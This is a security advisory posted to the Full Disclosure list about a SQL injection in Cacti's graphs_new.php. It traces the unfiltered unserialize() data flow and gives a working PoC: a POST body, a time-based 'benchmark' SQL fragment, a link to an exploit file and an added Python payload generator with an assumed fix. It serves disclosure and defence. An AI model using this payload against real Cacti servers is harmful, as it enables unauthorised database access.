<div style="font:14px/1.5 'Lucida Grande', '微软雅黑';color:#333;"><p
style="font:14px/1.5 'Arial';margin:0;"><span style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif; line-height:
1.5;">==========================</span></p><div
class="mail_quote_E22B806E4DEE4EBFAACCC165AD9FAAE2" style="font: 14px/1.5
'Lucida Grande';color:#333;"><div style="font:14px/1.5 'Lucida Grande',
'微软雅黑';color:#333;"><div style="font-family: 'Lucida Grande', 'Lucida Sans
Unicode', sans-serif !important;">Advisory: Cacti SQL Injection
Vulnerability</div><div style="font-family: 'Lucida Grande', 'Lucida Sans
Unicode', sans-serif !important;">Author: <font color="#0079a5"><a
href="mailto:xiaotian.wang@xxxxxxxxxxxxxxxxxxxx"
title="mailto:xiaotian.wang@xxxxxxxxxxxxxxxxxxxx" style="text-decoration: none;
color: rgb(19, 109, 186); -webkit-user-drag:
none;">xiaotian.wang@xxxxxxxxxxxxxxxxxxxx</a></font></div><div style="widows:
1; font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif
!important;">Affected Version: <font color="#000000"><span style="font-size: 13px; line-height: normal; background-color: rgb(232, 232, 232);">0.8.8f</span></font><font face="Lucida Grande, Lucida Sans Unicode, sans-serif"> (the latest release at the time of writing) and earlier versions</font></div><div
style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif
!important;">Vendor URL: <a href="http://www.cacti.net/"
title="http://www.cacti.net/" style="text-decoration: none; color: rgb(19, 109,
186); -webkit-user-drag: none; line-height:
1.5;">http://www.cacti.net/</a></div><div style="font-family: 'Lucida Grande',
'Lucida Sans Unicode', sans-serif !important;">Vendor Status: <font
color="#ff2712">Unfixed</font></div><div style="font-family: 'Lucida Grande',
'Lucida Sans Unicode', sans-serif
!important;">==========================</div><div style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif !important;"><div>Vulnerability
Description</div><div>==========================</div><div><font
color="#dd2067">Vulnerable file: /<span style="line-height:
1.5;">cacti/graphs_new.php:</span></font></div><div>
<p style="font-size: 10pt; line-height: 20px;">/cacti/graphs_new.php line 35</p>
<pre style="font-size: 8pt; line-height: 16px;">if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
switch ($_REQUEST["action"]) {
    <span style="color: red;">case 'save':
        form_save(); // highlight 1</span>
        break;
    ……
</pre>
<p style="font-size: 12pt; line-height: 24px;"><font color="#005a7c"><b>Notice the highlighted code and follow the function form_save()</b></font></p>
<p style="font-size: 10pt; line-height: 20px;">/cacti/graphs_new.php line 59</p>
<pre style="font-size: 8pt; line-height: 16px;">function <span style="color: red;">form_save</span>() {
    ……  (part of the code omitted)
    if (isset($_POST["save_component_new_graphs"])) {
        <span style="color: red;">host_new_graphs_save(); // highlight 2</span>
        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    ……
</pre>
<p style="font-size: 12pt; line-height: 24px;"><font color="#005a7c"><b>Follow the function host_new_graphs_save()</b></font></p>
<p style="font-size: 10pt; line-height: 20px;">/cacti/graphs_new.php line 126</p>
<pre style="font-size: 8pt; line-height: 16px; color: rgb(118, 146, 60);">function host_new_graphs_save() {
    <span style="color: rgb(192, 80, 77);">$selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));</span> <span style="color: red;">// just unserialize, no filter</span>
    /* form an array that contains all of the data on the previous form */
    ……
    debug_log_clear("new_graphs");
    while (list($form_type, <span style="color: red;">$form_array</span>) = each(<span style="color: red;">$selected_graphs_array</span>)) {
        $current_form_type = $form_type;
        while (list($form_id1, <span style="color: red;">$form_array2</span>) = each(<span style="color: red;">$form_array</span>)) {
            /* enumerate information from the arrays stored in post variables */
            if ($form_type == "cg") {
                $graph_template_id = $form_id1;
            }elseif ($form_type == "sg") {
                while (list(<span style="color: red;">$form_id2</span>, $form_array3) = each(<span style="color: red;">$form_array2</span>)) {
                    $snmp_index_array = $form_array3;
                    $snmp_query_array["snmp_query_id"] = $form_id1;
                    $snmp_query_array["snmp_index_on"] = get_best_data_query_index_type($_POST["host_id"], $form_id1);
                    <span style="color: red;">$snmp_query_array["snmp_query_graph_id"] = $form_id2</span>; // highlight 3
                }
                $graph_template_id = <span style="color: red;">db_fetch_cell</span>("select graph_template_id from snmp_query_graph where<span style="color: red;"> id=" . $snmp_query_array["snmp_query_graph_id"]); // no filter: SQL injection</span>
</pre>
</div><div><p style="font-size: 18px;"><font color="#003c52">Note that $selected_graphs_array is produced by unserialize() on a POST parameter that the (authenticated) user fully controls, with no check on its shape or contents. The nested while loops walk it as a three-level array: when $form_type is "sg", each innermost key ($form_id2) is copied into $snmp_query_array["snmp_query_graph_id"], and after the inner loop that value is concatenated, unescaped, into the SELECT handed to db_fetch_cell(). Data the attacker controls therefore becomes part of the SQL text, which is a </font><font color="#a8184b">SQL injection</font><font color="#003c52">. Two details matter for exploitation: the id is not quoted in the query, so no quote character is needed and a key such as 1 and benchmark(20000000,sha1(1))-- is sufficient (see the MySQL log in the PoC section), and snmp_query_graph_id is overwritten on every inner iteration, so only the last innermost key of each block is used. Because stripslashes() runs before unserialize(), the serialized payload must not depend on backslashes.</font></p></div></div><div style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif
!important;">==========================</div><div style="font-family: 'Lucida
Grande', 'Lucida Sans Unicode', sans-serif !important;">POC &&
EXP</div><div style="font-family: 'Lucida Grande', 'Lucida Sans Unicode',
sans-serif !important;">==========================</div><div
style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif
!important;">1. Log in. graphs_new.php requires an authenticated Cacti session, so this is a post-authentication issue.</div><div style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif !important;">2. POST to <a href="http://target/cacti/graphs_new.php" title="http://target/cacti/graphs_new.php" style="text-decoration: none; color: rgb(19, 109, 186); -webkit-user-drag: none;">http://target/cacti/graphs_new.php</a></div><div style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif !important;">Data: <code>__csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]</code></div><div style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif !important;">Here __csrf_magic must be the token of your own session (the value above is an example). action=save together with save_component_new_graphs=1 routes the request through form_save() into host_new_graphs_save(). [injection] is a URL-encoded PHP-serialized array in which the SQL fragment is the innermost key, i.e. $selected_graphs_array["sg"][&lt;snmp_query_id&gt;][&lt;fragment&gt;], so that it is copied into $snmp_query_array["snmp_query_graph_id"]. The payload must not contain backslashes, because stripslashes() is applied before unserialize().</div><div style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif !important;">{Injection exp can be found on my server: <a href="http://pandas.pw/cacti.exp" title="http://pandas.pw/cacti.exp" style="text-decoration: none; color: rgb(19, 109, 186); -webkit-user-drag: none;">http://pandas.pw/cacti.exp</a>}</div><div style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif !important;">3. The query recorded in the MySQL log: <code>select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--</code>. The benchmark() call delays the response measurably, which confirms the injection without needing any output from the query.</div><div style="font-family: 'Lucida Grande', 'Lucida Sans Unicode', sans-serif !important;">====================</div></div></div></div>
Attachment: cacti sqli(1).txt (binary data)
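The following is an added example serving both the code walkthrough and the PoC above; it is not code from the advisory, from the linked exploit file, or from Cacti itself. It builds the selected_graphs_array payload with the SQL fragment as the innermost key under "sg", fills in the Data line from the PoC, replays the loop logic of host_new_graphs_save() to show the exact SELECT string db_fetch_cell() would receive, and contrasts that with an integer-only check that rejects the fragment. The SQL fragment, host_id, snmp_query_id and CSRF token are constructed sample values, the serializer is a minimal re-implementation of PHP's serialize() for the types needed here, and the hardened check is an assumed fix, not Cacti's actual patch.

```python
"""Added example: payload construction and data-flow replay for the
graphs_new.php injection described above. Sample inputs are constructed."""
import re
from urllib.parse import urlencode

# Constructed sample inputs (not taken from a live system).
SNMP_QUERY_ID = 1
SQL_FRAGMENT = "1 and benchmark(20000000,sha1(1))--"   # value seen in the advisory's MySQL log
QUERY_PREFIX = "select graph_template_id from snmp_query_graph where id="


def php_serialize(value):
    """Minimal PHP serialize() for bool, int, str and nested dict/list.
    Dicts become PHP arrays (keys keep their int/str type); list indices
    become integer keys. String lengths are byte lengths, as PHP counts them."""
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %r" % type(value))


def build_selected_graphs_array(snmp_query_id, sql_fragment):
    """Shape the nested loops expect: $arr["sg"][$form_id1][$form_id2] = ...
    $form_id2 is the innermost key, and that is what reaches the query."""
    return {"sg": {snmp_query_id: {sql_fragment: {}}}}


def build_post_body(csrf_token, host_id, payload):
    """The PoC Data line with [injection] filled in. csrf_token must be the
    __csrf_magic of the attacker's own authenticated session (assumed value)."""
    return urlencode({
        "__csrf_magic": csrf_token,
        "action": "save",
        "save_component_new_graphs": "1",
        "host_id": str(host_id),
        "selected_graphs_array": php_serialize(payload),
    })


def queries_issued(selected_graphs_array):
    """Replays the while loops of host_new_graphs_save() and returns the SQL
    strings db_fetch_cell() would be given. snmp_query_graph_id is overwritten
    on each inner iteration, so only the last innermost key per block is used."""
    queries = []
    for form_type, form_array in selected_graphs_array.items():
        for form_id1, form_array2 in form_array.items():
            if form_type == "cg":
                continue                      # $graph_template_id = $form_id1; no query
            if form_type == "sg":
                snmp_query_array = {}
                for form_id2, _form_array3 in form_array2.items():
                    snmp_query_array["snmp_query_id"] = form_id1
                    snmp_query_array["snmp_query_graph_id"] = form_id2
                # PHP: "... where id=" . $snmp_query_array["snmp_query_graph_id"]
                queries.append(QUERY_PREFIX + str(snmp_query_array["snmp_query_graph_id"]))
    return queries


def validated_query(snmp_query_graph_id):
    """Assumed hardened variant (not Cacti's own patch): accept only a
    non-negative integer before concatenating, the kind of check Cacti applies
    elsewhere via input_validate_input_number(). Returns None on rejection."""
    if not re.fullmatch(r"[0-9]+", str(snmp_query_graph_id)):
        return None
    return QUERY_PREFIX + str(int(snmp_query_graph_id))


if __name__ == "__main__":
    payload = build_selected_graphs_array(SNMP_QUERY_ID, SQL_FRAGMENT)
    print(php_serialize(payload))
    print(build_post_body("sid:EXAMPLE", 1, payload))
    for q in queries_issued(payload):
        print(q)
    print(validated_query(SQL_FRAGMENT), validated_query(7))
```

Running it prints the serialized array, the complete POST body, the SELECT that matches the MySQL log line in the PoC, and the result of the hardened check (None for the fragment, a normal query for a plain integer id). The payload contains no backslashes, so stripslashes() leaves it intact.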
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/